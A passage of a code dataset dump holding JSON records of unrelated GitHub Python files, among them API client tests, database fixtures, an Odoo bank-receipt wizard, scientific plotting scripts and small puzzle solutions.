y1)], fill=None,\n outline=colorDict[label])\n for delta in [0, 1, -1, 2, -2]:\n draw.rectangle([(x0 - delta, y0 - delta), (x1 + delta, y1 + delta)],\n fill=None, outline=colorDict[label])\n\n # Draw text\n \n text_y_compensation = -37\n text_x_compensation = 0\n #text_color = (255, 255, 255, 255)\n text_color = colorDict[label]\n text_border_color = (255, 255, 255, 255)\n\n label_text = translate_label(label, language='en')\n if text_enable:\n if text_border_enable:\n for delta in [1, -1, ]:\n draw.text((x0 + text_x_compensation + delta, y0 + text_y_compensation),\n label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation, y0 + text_y_compensation +\n delta), label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation + delta, y0 + text_y_compensation +\n delta), label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation, y0 + text_y_compensation),\n label_text, font=font, fill=text_color)\n if show:\n image.show()\n return image\n\ndef save_preview(\n image_path,\n components,\n destination_path,\n language='en',\n show = False\n):\n image = generate_preview(image_path=image_path, components=components, language=language, show=show)\n image.save(destination_path)","repo_name":"Dsbaule/Sketch2AIA","sub_path":"src/AIAGeneration/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16366614024","text":"from unittest.mock import Mock\n\nfrom tests.testcase import TestCase\nfrom hypernode_api_python.client import (\n HypernodeAPIPython,\n)\n\n\nclass TestGetAppInfoOr404(TestCase):\n def setUp(self):\n self.client = HypernodeAPIPython(token=\"mytoken\")\n self.mock_request = Mock()\n self.client.requests = self.mock_request\n\n def test_calls_hypernode_api_app_endpoint_with_app_name(self):\n self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n self.mock_request.assert_called_once_with(\n \"GET\", \"/v2/app/yourhypernodeappname/?destroyed=false\"\n )\n\n def test_raises_if_hypernode_api_returns_404(self):\n response = Mock()\n response.status_code = 404\n self.mock_request.return_value = response\n\n with self.assertRaises(RuntimeError):\n self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n def test_returns_response_json_if_hypernode_api_returns_app_info(self):\n response = Mock()\n response.status_code = 200\n self.mock_request.return_value = response\n\n ret = self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n self.assertEqual(ret, self.mock_request.return_value)\n","repo_name":"ByteInternet/hypernode-api-python","sub_path":"tests/client/test_get_app_info_or_404.py","file_name":"test_get_app_info_or_404.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"74221856362","text":"import pytest\nimport uuid\nfrom sqlalchemy import create_engine, text as sa_text\nfrom sqlalchemy.orm import Session\nfrom models.base_model import BaseModel\nimport importlib\nfrom tests.datasets.generic import DATA_SET\nfrom settings import settings\nfrom sqlalchemy_utils import create_database, drop_database\nfrom sqlalchemy.orm import sessionmaker\nfrom settings import settings\nfrom models.base_model import BaseModel\n\ndef unzip_data_set(data_set):\n \"\"\"\n Reduce any format of data set input to an iterator of dict { model: data }\n\n Args:\n data_set: any type of object.\n \"\"\"\n if isinstance(data_set, (list, tuple)):\n for entry in data_set:\n yield from unzip_data_set(entry)\n\n elif isinstance(data_set, str):\n mod = importlib.import_module(f\"tests.datasets.{data_set}\")\n yield from unzip_data_set(mod.DATA_SET)\n\n elif isinstance(data_set, dict):\n yield data_set\n\n@pytest.fixture(name=\"db\")\ndef fixture_db(request):\n \"\"\"\n Function scoped database which will create a database from shared connection\n The database can be passed a custom dataset\n\n IMPORTANT:\n This is the default fixture to use when testing write operations\n \"\"\"\n db_name = \"service_backend_test_\" + str(uuid.uuid4()).replace(\"-\", \"_\")\n # text = f\"CREATE DATABASE {db_name} ENCODING 'utf8' TEMPLATE 'template1'\"\n db_url = f'postgresql://test:test@localhost:5434/{db_name}'\n settings.SQLALCHEMY_DATABASE_URL = db_url\n create_database(db_url)\n engine = create_engine(\n url=db_url,\n echo=False,\n future=True\n )\n try:\n # session.execute(sa_text(text))\n BaseModel.metadata.drop_all(engine)\n BaseModel.metadata.create_all(engine)\n with Session(engine) as session:\n dataset = [DATA_SET]\n if hasattr(request, \"param\"):\n dataset = request.param\n dataset = unzip_data_set(dataset)\n signed = []\n for model_rows in dataset:\n if model_rows not in signed:\n for model, rows in model_rows.items():\n entries = []\n for row in rows:\n new_entry = model(**row)\n entries.append(new_entry)\n session.add_all(entries)\n session.flush()\n signed.append(model_rows)\n session.commit()\n\n with Session(engine) as session:\n yield session\n finally:\n drop_database(db_url)\n # with engine.connect() as conn:\n # version = conn.dialect.server_version_info\n # pid_column = \"pid\" if (version >= (9, 2)) else \"procpid\"\n # text = f\"\"\"\n # SELECT pg_terminate_backend(pg_stat_activity.{pid_column})\n # FROM pg_stat_activity\n # WHERE pg_stat_activity.datname = '{db_name}'\n # AND {pid_column} <> pg_backend_pid();\n # \"\"\"\n # conn.execute(sa_text(text))\n\n # # Drop the database.\n # with engine.connect() as conn:\n # text = f\"DROP DATABASE {db_name}\"\n # conn.execute(sa_text(text))\n\n\nclass TestBlog:\n def setup_class(self):\n engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URL, echo=True, future=True\n )\n SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n BaseModel.metadata.create_all(engine)\n self.session = Session()\n self.valid_author = Author(\n firstname=\"Ezzeddin\",\n lastname=\"Aybak\",\n email=\"aybak_email@gmail.com\"\n )\n\n def teardown_class(self):\n self.session.rollback()\n self.session.close()\n\n@pytest.fixture(scope=\"module\")\ndef db_session():\n engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URL, echo=True, future=True\n )\n # session = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n BaseModel.metadata.create_all(engine)\n session = Session()\n yield session\n session.rollback()\n session.close()","repo_name":"ThibaultRizzo/base-ramses","sub_path":"tests/fixtures/database_fixtures.py","file_name":"database_fixtures.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40397188426","text":"from openerp.osv import fields, orm\n\nclass emissione_riba(orm.TransientModel):\n \n _inherit = \"riba.emissione\"\n \n def _vaidate_partner_bank(self, cr, uid, ids, partner, context=None):\n if not partner.bank_ids:\n raise orm.except_orm('Attenzione!', 'Il cliente %s non ha la banca!!!' % partner.name)\n # At least one valid bank\n one_valid_bank =False\n #for bank in self.pool.get('account.move.line').browse(cr, uid, partner.bank_ids):\n for bank in partner.bank_ids:\n if bank.state == \"iban\":\n #iban = bank.acc_number\n #iban = iban.replace(\" \",\"\")\n one_valid_bank = True\n bank_ok = bank\n break \n if bank.state == \"bank\":\n account = bank.acc_number\n if bank.bank_cab and bank.bank_abi:\n one_valid_bank = True\n bank_ok = bank\n break\n if not one_valid_bank:\n raise orm.except_orm('Attenzione!', 'Il cliente %s con banca senza iban/abi-cab corretta!!!' % partner.name)\n \n return bank_ok \n \n \n def crea_distinta(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n def create_rdl(conta, bank_id, rd_id, date_maturity, partner_id, acceptance_account_id):\n rdl = {\n 'sequence' : conta,\n 'bank_id' : bank_id,\n 'distinta_id': rd_id,\n 'due_date' : date_maturity,\n 'partner_id' : partner_id,\n 'state': 'draft',\n 'acceptance_account_id': acceptance_account_id,\n }\n return riba_distinta_line.create(cr, uid, rdl, context=context)\n \n \"\"\"\n Qui creiamo la distinta\n \"\"\"\n wizard_obj = self.browse(cr,uid,ids)[0]\n active_ids = context and context.get('active_ids', [])\n riba_distinta = self.pool.get('riba.distinta')\n riba_distinta_line = self.pool.get('riba.distinta.line')\n riba_distinta_move_line = self.pool.get('riba.distinta.move.line')\n move_line_obj = self.pool.get('account.move.line')\n\n # create distinta\n rd = {\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'seq.riba.distinta'),\n 'config': wizard_obj.configurazione.id,\n 'user_id': uid,\n 'date_created': fields.date.context_today(self,cr,uid,context),\n }\n rd_id = riba_distinta.create(cr, uid, rd)\n \n # group by partner and due date\n grouped_lines = {}\n move_line_ids = move_line_obj.search(cr, uid, [('id', 'in', active_ids)], context=context)\n for move_line in move_line_obj.browse(cr, uid, move_line_ids, context=context):\n if move_line.partner_id.group_riba:\n if not grouped_lines.get(\n (move_line.partner_id.id, move_line.date_maturity), False):\n grouped_lines[(move_line.partner_id.id, move_line.date_maturity)] = []\n grouped_lines[(move_line.partner_id.id, move_line.date_maturity)].append(\n move_line)\n \n # create lines\n conta = 1\n \n for move_line in move_line_obj.browse(cr, uid, move_line_ids, context=context):\n #if move_line.partner_id.bank_ids:\n # bank_id = move_line.partner_id.bank_ids[0]\n #else:\n # raise orm.except_orm('Attenzione!', 'Il cliente %s non ha la banca!!!' % move_line.partner_id.name)\n partner = move_line.partner_id\n bank_id = self._vaidate_partner_bank(cr, uid, ids, partner, context)\n \n if move_line.partner_id.group_riba:\n for key in grouped_lines:\n if key[0] == move_line.partner_id.id and key[1] == move_line.date_maturity:\n rdl_id = create_rdl(conta, bank_id.id, rd_id, move_line.date_maturity, move_line.partner_id.id, wizard_obj.configurazione.acceptance_account_id.id)\n total = 0.0\n invoice_date_group = ''\n for grouped_line in grouped_lines[key]:\n riba_distinta_move_line.create(cr, uid, {\n 'riba_line_id': rdl_id,\n 'amount': grouped_line.amount_residual,\n 'amount_origin': grouped_line.debit,\n 'move_line_id': grouped_line.id,\n }, context=context)\n del grouped_lines[key]\n break\n else:\n rdl_id = create_rdl(conta, bank_id.id, rd_id, move_line.date_maturity, move_line.partner_id.id, wizard_obj.configurazione.acceptance_account_id.id)\n riba_distinta_move_line.create(cr, uid, {\n 'riba_line_id': rdl_id,\n 'amount': move_line.amount_residual,\n 'amount_origin': move_line.debit,\n 'move_line_id': move_line.id,\n }, context=context)\n \n conta+=1\n \n # ----- show distinta form\n mod_obj = self.pool.get('ir.model.data')\n res = mod_obj.get_object_reference(cr, uid, 'l10n_it_ricevute_bancarie', 'view_distinta_riba_form')\n res_id = res and res[1] or False,\n return {\n 'name': 'Distinta',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': res_id,\n 'res_model': 'riba.distinta',\n 'type': 'ir.actions.act_window',\n #'nodestroy': True,\n 'target': 'current',\n 'res_id': rd_id or False,\n }\n\n","repo_name":"alessandrocamilli/7-openforce-addons","sub_path":"openforce_riba_extended/wizard/wizard_emissione_riba.py","file_name":"wizard_emissione_riba.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"73086973802","text":"import pytest\nfrom faker import Faker\n\nfrom django.urls import reverse\n\nfaker = Faker()\n\npytestmark = pytest.mark.django_db\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"public\", 201), (\"NOT_A_VALID_OWNER\", 400)])\ndef test_create_owner(\n api_client,\n name,\n credential,\n status_code,\n):\n url = reverse(\"owners-list\")\n\n data = {\n \"name\": name,\n \"credential\": credential.id,\n }\n response = api_client.post(url, data)\n\n assert response.status_code == status_code, response.data\n\n\ndef test_retrieve_owner(api_client, owner):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.get(url)\n\n assert response.status_code == 200, response.data\n\n\ndef test_list_owners(api_client, owner_factory):\n url = reverse(\"owners-list\")\n owner_factory.create_batch(3)\n\n response = api_client.get(url)\n\n assert response.status_code == 200, response.data\n assert len(response.data) == 3\n\n\ndef test_filter_owners_by_credential(\n api_client,\n credential_factory,\n owner_factory,\n):\n url = reverse(\"owners-list\")\n\n first_credential, second_credential = credential_factory.create_batch(2)\n first_credential_owners = owner_factory.create_batch(3, credential=first_credential)\n owner_factory.create(credential=second_credential)\n\n response = api_client.get(url, {\"credential\": first_credential.id})\n\n assert response.status_code == 200, response.data\n assert {owner_data[\"id\"] for owner_data in response.json()} == {owner.id for owner in first_credential_owners}\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"public\", 200), (\"NOT_A_VALID_OWNER\", 400)])\ndef test_update_owner(\n api_client,\n owner,\n name,\n status_code,\n):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n data = {\"name\": name}\n response = api_client.patch(url, data)\n\n assert response.status_code == status_code, response.data\n\n\ndef test_delete_owner(api_client, owner):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 204, response.data\n\n\ndef test_delete_owner_conflict_resource(api_client, owner, resource_factory):\n resource_factory.create(primary_key_owner=owner)\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 409, response.data\n\n\ndef test_delete_owner_conflict_column(api_client, owner, column_factory):\n column_factory.create(owner=owner)\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 409, response.data\n","repo_name":"arkhn/fhir-river","sub_path":"tests/pyrog/api/test_owner.py","file_name":"test_owner.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"} +{"seq_id":"29965537733","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 22 17:50:23 2020\n\n@author: isabellatobias\n\"\"\"\n#Code for data analysis using the Simpson rule\n\n#Imports the required libraries\nfrom __future__ import division\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\n#Files with default values\ndata = pd.read_excel('default_values.xlsx', names=['TIME', 'Default'])\ndata.head()\n\n#File with the tested samples\ndata2 = pd.read_excel('tested_values.xlsx', names=['TIME', 'Tested'])\ndata2.head()\n\n#Values chosen from the files [lines,columns]\n#We divided our values for 1000 ou 10000 because they were too big \nTime = data.iloc[46:, 0].values/1000\nDefault = data.iloc[46:, 2].values/100000\nTested = data2.iloc[11:, 1].values/100000\n\n#Now we use the Simpson's Rule\n#We are interested in the diference between the integrals\nIntegral = integrate.simps(Tested, Time)-integrate.simps(Default, Time)\n\n#Figure size\n#Plot the integral\nplt.figure(figsize = (15,10))\nplt.scatter(Time,Integral, color='b', label='Primeiro Momento')\n\n#Name the x axis\n#Name the y-axis\n#Positions subtitles\n#Place the title\n#Place grid\nplt.xlabel('Date')\nplt.ylabel('Integral')\nplt.legend(loc='best')\nplt.title(\"Cicle\")\nplt.grid(True)\n\n#Displays the graph\nplt.show()\n","repo_name":"tobiasisabella/analysis-by-simpson-integral-python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4253347655","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n res = False\n directions = [(0,1), (0,-1), (1,0), (-1,0)]\n \n def dfs(word, x, y, prevDirection, visited):\n nonlocal res\n if word == \"\":\n res = True\n return\n if (x,y) in visited:\n return\n if x < 0 or x >= len(board[0]) or y < 0 or y >= len(board):\n return\n if word[0] != board[y][x]:\n return\n else:\n for direction in directions:\n if (-prevDirection[0], -prevDirection[1]) != direction:\n visited.add((x, y))\n dfs(word[1:], x+direction[0], y+direction[1], direction, visited.copy())\n\n count = defaultdict(int, sum(map(Counter, board), Counter()))\n if count[word[0]] > count[word[-1]]:\n word = word[::-1]\n\n for y in range(len(board)):\n for x in range(len(board[0])):\n visited = set()\n dfs(word, x, y, (0,0), visited)\n if res:\n return res\n\n return res\n","repo_name":"kapforty/leetcode","sub_path":"python3/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21936181110","text":"#!/usr/bin/env python3\nimport sys\n#sys.path.append(\"/home/anthony/Documents/Doctorat/PROD/ML_Climate/2-Programs\")\nsys.path.append(\"/home/anthony/Documents/Doctorat/PROD/ML_Climate/3-Test/7-Moist_Pantanal/Programs\")\nimport cartopy\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset as NetCDFFile\nfrom netCDF4 import num2date\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib\nimport matplotlib.gridspec as gridspec\nimport pandas as pd\nimport cartopy.io.shapereader as shpreader\n\n\nfrom class_data_ER5moist import input_ML\nfrom netcdf_output import output_SOM_NetCDF_moistconv\nfrom numpy import linalg as LA\n\n##########################\n\nmoistdir = \"./Originals/PANTANAL_vimd_single-level_JFD_1980-2010_daily.nc\"\ndout = \"./output.nc\"\n\ndgraphs = \"./Graphics/\"\n\n##########################\n\nclass output:\n def __init__(self, output):\n self.nc = NetCDFFile(output, \"r\")\n self.lon = self.nc.variables[\"lon\"][:]\n self.lat = self.nc.variables[\"lat\"][:]\n time = self.nc.variables[\"time\"]\n self.dtime = num2date(time[:], time.units)\n self.xdim = len(self.nc.variables[\"m\"][:])\n self.ydim = len(self.nc.variables[\"n\"][:])\n self.ndim = self.ydim ; self.mdim = self.xdim\n \n self.ml = np.arange(0.5,6.5)\n \n self.moistconv_cluster = self.nc.variables[\"moistconv\"][:] # n,m,lat, lon\n self.mapvect_m = self.nc.variables[\"mapvect_m\"][:] # time\n self.mapvect_n = self.nc.variables[\"mapvect_n\"][:] # time\n \n def koho_map(self):\n Koho = np.zeros((self.ydim,self.xdim))\n \n for koho_vect_x,koho_vect_y in zip(self.mapvect_m, self.mapvect_n):\n Koho[int(koho_vect_y),int(koho_vect_x)] +=1\n # y = n = vertical \n self.Koho = Koho\n \n def koho_filter(self, filter):\n Koho = np.zeros((self.ydim,self.xdim))\n \n for fil, koho_vect_x,koho_vect_y in zip(filter, self.mapvect_m, self.mapvect_n):\n if fil==1:\n Koho[int(koho_vect_y),int(koho_vect_x)] +=1\n # y = n = vertical \n return Koho\n \n def plot_koho(self, koho, title, namefig):\n plt.figure(figsize= (6,5)) \n plt.pcolor(self.ml, self.ml, np.flip(koho, axis = 0))\n plt.xticks(np.arange(1,6))\n plt.yticks(np.arange(1,6), np.flip(np.arange(1,6)))\n plt.colorbar()\n plt.title(title)\n plt.savefig(dgraphs + namefig)\n plt.close()\n \n\n########################## \n \nmoistconv = input_ML(moistdir).moistconv.data\nclu = output(dout)\nclu.koho_map()\n\n##########################\n\n# Plot distribution cluster\nclu.plot_koho(clu.Koho, \"Distribution Kohonen map\", \"1-Distribution_Kohonen_map.png\")\n\n##########################\n \ndef plot_map(gs, col, row, data, title):\n plt.subplot(gs[row, col], projection=ccrs.PlateCarree())\n ax = plt.gca()\n ax.add_feature(cartopy.feature.BORDERS)\n ax.add_feature(cartopy.feature.COASTLINE)\n cbar = ax.contourf(clu.lon, clu.lat, data, levels = np.arange(-3,2.25,0.25), vmin = -1.5, vmax = 1.)\n ax.ylabel = str(col+1)\n #plt.title(title)\n plt.colorbar(cbar)\n #return cbar\n\nfig = plt.figure(figsize= (10,10)) \ngs = matplotlib.gridspec.GridSpec(5, 5)\nfor n in range(0,5):\n for m in range(0,5):\n plot_map(gs, m, n, clu.moistconv_cluster[n,m,:,:], \"n = {0} / m = {1}\".format(n+1,m+1))\n \n ax = plt.gca()\n if m ==0:\n ax.text(-0.2, 0.5, n+1, va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize = 20)\n if n ==2: \n ax.text(-0.5, 0.5, \"n\", va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize = 30) \n if n == 0:\n ax.text(0.5, 1.1, m+1, va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize = 20)\n if m ==2:\n ax.text(0.5, 1.3, \"m\", va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize = 30)\n\nplt.savefig(dgraphs + \"2-Clusters.png\")\nplt.close()\n\n#Vertically integrated moisture divergence\n# + grand = + divergent -> - bonne condition precipitation\n# + grand en valeur absolu -> + d'humidit2 en jeu\n\n\n##########################\n#\n\"\"\"\nLevy, M. C. (2017). \nRain gauge data for the Brazilian rainforest-savanna transition zone, \nHydroShare, http://www.hydroshare.org/resource/9ee10ae69e074f819f023df73e15c4e1\n\"\"\"\n\n# Prepare rainfall dataset\nrain_data = \"./Originals/rain_data.csv\"\ndfrain = pd.read_csv(rain_data)\nSUM = (dfrain['month'] == 12) | (dfrain['month'] == 1) | (dfrain['month'] == 2)\ndfrain = dfrain[SUM]\nYEAR = (dfrain['year'] >= 1980) & (dfrain['year'] < 2011)\ndfrain = dfrain[YEAR]\n\n#site = np.unique(dfrain['site'].to_numpy())\n\n##########\n\nD= {}\nD[2157004] = [\"Porto Murtinho\",-21.7014,-57.8917]\nD[1556004] = [\"Cuiabá\", -15.6333, -56.1]\nD[1756001] = [\"SÃO JOSÉ DO PIQUIRI\",-17.2914 , -56.3847]\nD[1755003] = [\"SÃO JERÔNIMO\", -17.2017, -56.0086]\nD[1656003] = [\"SÃO JOSÉ DO BORIRÉU\", -16.9211, -56.2236]\nD[1657003] = [\"CÁCERES\"\t, -16.0817, -57.6942]\nD[1654000] = [\"RONDONÓPOLIS\", -16.4711, -54.6561]\nD[1455002] = [\"COIMBRA - PORTO DE CIMA\", -14.8833, -55.8667]\nD[1957002] = [\"CORUMBÁ (ETA)\", -19.0058, -57.6019]\nD[1957006] = [\"PORTO ESPERANÇA\",-19.6008, -57.4381]\nD[1957004] = [\"FORTE COIMBRA\", -19.9186, -57.7894]\nD[1957003] = [\"PORTO DA MANGA\", -19.2583, -57.2353]\nD[1756003] = [\"PORTO DO ALEGRE\", -17.6233, -56.965]\nD[1854005] = [\"COXIM\", -18.5, -54.9333]\nD[2056001] = [\"MIRANDA\", -20.2408, -56.3958]\n#D[] = \"\"\n\n# Intégrer plus de statins et les regrouper par zone\n# Prendre les regionss cf hydroBasins Thienan puis voir si pt contenu dans zone\n\ndef plot_locst(ncol, nrow, ind, stnum):\n ax = plt.subplot(ncol, nrow, ind, projection=ccrs.PlateCarree())\n ax.set_extent([-62,-52,-23,-14])\n\n # BORDERS\n ax.add_feature(cartopy.feature.BORDERS)\n \"\"\"\n geo_reg_shp = shpreader.natural_earth(resolution='50m', category='cultural',\n name='admin-0-boundary-lines')\n geo_reg = shpreader.Reader(geo_reg_shp)\n geo_reg = geo_reg.records()\n for rec in geo_reg:\n ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"r\", facecolor='none')#, linewidth = self.pantlw )\n \"\"\"\n # PANTANAL & UPRB\n geo_reg_shp = shpreader.natural_earth(resolution='50m', category='physical',\n name='geography_regions_polys')\n geo_reg = shpreader.Reader(geo_reg_shp)\n geo_reg = geo_reg.records()\n #\n # shapefile of the UPRB\n UPRB_shp = \"/home/anthony/Documents/Doctorat/Tools/[DATA] HydroBASINS/UPRB.shp\"\n UPRB = shpreader.Reader(UPRB_shp)\n UPRB = UPRB.records()\n #\n for rec in geo_reg:\n if (rec.attributes[\"name_es\"]==\"Pantanal\"):\n ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"r\", facecolor='none')#, linewidth = self.pantlw )\n #\n for rec in UPRB:\n ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"b\", facecolor='none')#, linewidth = self.pantlw )\n # \n for n in stnum:\n L = D[n]\n plt.plot(L[2],L[1], color = \"b\", marker = \"o\")\n\ndef plot_koho(ncol, nrow, ind, koho, title, namefig):\n plt.subplot(ncol, nrow, ind) \n plt.pcolor(clu.ml, clu.ml, np.flip(koho, axis = 0))\n plt.xticks(np.arange(1,6))\n plt.yticks(np.arange(1,6), np.flip(np.arange(1,6)))\n plt.colorbar()\n plt.title(title)\n\n\n\nstnum = list(D.keys())\nplot_locst(1, 1, 1, stnum) \nplt.savefig(dgraphs + \"stations.png\")\nplt.close()\n\n\n\n# Contour UPRB (smoothed) et contour Pantanal\n\nfor index, L in D.items():\n PM = dfrain['site']== index\n dfrain_PM = dfrain[PM]\n\n filtre = (dfrain_PM[\"value\"] > 2).to_numpy()\n rainy = np.full(filtre.shape, 1)\n rainy[filtre == False] = 0\n\n koho_PM = clu.koho_filter(rainy)\n \n plt.figure(figsize= (10,5))\n plot_koho(1, 2, 2, koho_PM, \"PM daily rainfall > 5mm\", \"3-\"+L[0]+\"_PRECIP.png\")\n plot_locst(1, 2, 1, [index])\n plt.savefig(dgraphs + \"3-\"+L[0]+\"_PRECIP.png\")\n plt.close()\n\n","repo_name":"VSCHY/SOMs_algo","sub_path":"Examples/Moisture_fluxes_Pantanal/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12359140720","text":"# Lincense: ...\n# authors: Michal, Jachym\n\nimport os, sys\n#import glob\nimport mimetypes, time\nimport json\nimport logging\nimport zipfile\nimport web\n\nfrom layman.errors import LaymanError\nfrom layman.layed.gsxml import GsXml\n\nclass UserPrefs:\n \"\"\"User preferences manager of LayMan\n \"\"\"\n\n config = None\n tempdir = None\n\n def __init__(self,config = None):\n \"\"\"constructor\n \"\"\"\n\n ## get configuration parser\n self._setConfig(config)\n\n def _setConfig(self,config):\n \"\"\"Get and set configuration files parser\n \"\"\"\n if config:\n self.config = config\n else:\n from layman import config\n self.config = config\n\n def createUser(self, userJsonStr):\n \"\"\" Create user and assign group membership\n userJsonStr: '{screenName: \"user\", roles: [{roleTitle, roleName}, {roleTitle, roleName}]}'\n return 409 Conflict if the user already exists\n \"\"\" \n logging.debug(\"[UserPrefs][createUser] %s\"% userJsonStr)\n \n userJson = json.loads(userJsonStr)\n user = userJson[\"screenName\"]\n grouplist = []\n for g in userJson[\"roles\"]:\n grouplist.append(g[\"roleName\"])\n\n gsx = GsXml(self.config)\n (code, message) = gsx.createUserWithGroups(user, grouplist)\n return (code, message)\n\n def updateUser(self, userJsonStr):\n \"\"\" Update user \n userJson: {screenName: \"user\", roles: [{roleTitle, roleName}, {roleTitle, roleName}]}\n if the user does not exist yet, create it.\n \"\"\" \n logging.debug(\"[UserPrefs][updateUser] %s\"% userJsonStr)\n\n userJson = json.loads(userJsonStr)\n user = userJson[\"screenName\"]\n grouplist = []\n for g in userJson[\"roles\"]:\n grouplist.append(g[\"roleName\"])\n\n gsx = GsXml(self.config)\n (code, message) = gsx.updateUserWithGroups(user, grouplist)\n return (code, message)\n\n def deleteUser(self, userName):\n \"\"\" Delete user\n \"\"\" \n logging.debug(\"[UserPrefs][deleteUser] %s\"% userName)\n\n gsx = GsXml(self.config)\n (code, message) = gsx.deleteUser(userName)\n return (code, message)\n\n","repo_name":"riskatlas/layman","sub_path":"server/layman/userprefs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17113158971","text":"def annotate(minefield):\n\n if minefield == []:\n return []\n\n if len(set(len(row) for row in minefield)) != 1:\n raise ValueError('Non-rectangular minefield!')\n\n if any(c not in ' *' for row in minefield for c in row):\n raise ValueError('Bad character!')\n\n mines = {\n (x, y)\n for y, row in enumerate(minefield)\n for x, char in enumerate(row)\n if char == '*'\n }\n\n return [\n ''.join(nbors(x, y, mines) if char == ' ' else '*'\n for x, char in enumerate(row))\n for y, row in enumerate(minefield)\n ]\n\n\ndef nbors(x, y, mines):\n\n coords = {\n (x - 1, y - 1), (x, y - 1), (x + 1, y - 1),\n (x - 1, y), (x + 1, y),\n (x - 1, y + 1), (x, y + 1), (x + 1, y + 1)\n }\n\n count = len(coords & mines)\n return str(count) if count else ' '\n","repo_name":"tomdml/exercism-solutions","sub_path":"minesweeper/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31715119114","text":"\"\"\"\nGeneral analysis of COVG ADC data (h5 files)\nLucas Koerner: koerner.lucas@stthomas.edu\n\n\"\"\"\nimport os\nimport sys\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport glob\nfrom scipy.signal import deconvolve, convolve, resample, decimate, resample_poly\nimport pandas as pd\nfrom filters.filter_tools import butter_lowpass_filter, delayseq_interp, butter_highpass_filter\nfrom analysis.adc_data import *\nfrom analysis.utils import find_nearest, find_closest_row, calc_fft\nfrom calibration.signal_chain import dn_per_nA\nfrom scipy.optimize import curve_fit, minimize, basinhopping\nfrom scipy.integrate import trapezoid\nfrom numpy.fft import fft, ifft, ifftshift\n\n# configure Matplotlib\nmatplotlib.use(\"Qt5agg\") # or \"Qt5agg\" depending on you version of Qt\nplt.ion()\n\n# setup data directory\ndata_dir_base = os.path.expanduser('~')\nif sys.platform == \"linux\" or sys.platform == \"linux2\":\n print('linux directory not yet configured')\nelif sys.platform == \"darwin\":\n data_dir_covg = \"/Users/koer2434/OneDrive - University of St. Thomas/UST/research/covg/fpga_and_measurements/daq_v2/data/clamp/{}{:02d}{:02d}\"\nelif sys.platform == \"win32\":\n data_dir_covg = os.path.join(data_dir_base, 'Documents/covg/data/{}{:02d}{:02d}')\n\ndata_dir = data_dir_covg.format(2022, 1, 16)\nFS = 5e6\nSAMPLE_PERIOD = 1/FS\nfig_dir = '/Users/koer2434/My Drive/UST/research/covg/manuscripts/biophysical_society_2022/figures'\n\n# TODO: fig_dir\n# TODO: summary tables\n# TODO: description of various data-sets\n# TODO: should the dir and file be set with the analysis type?\n# TODO: demonstrate RF adjustment -- label with nA\n# TODO: determine total 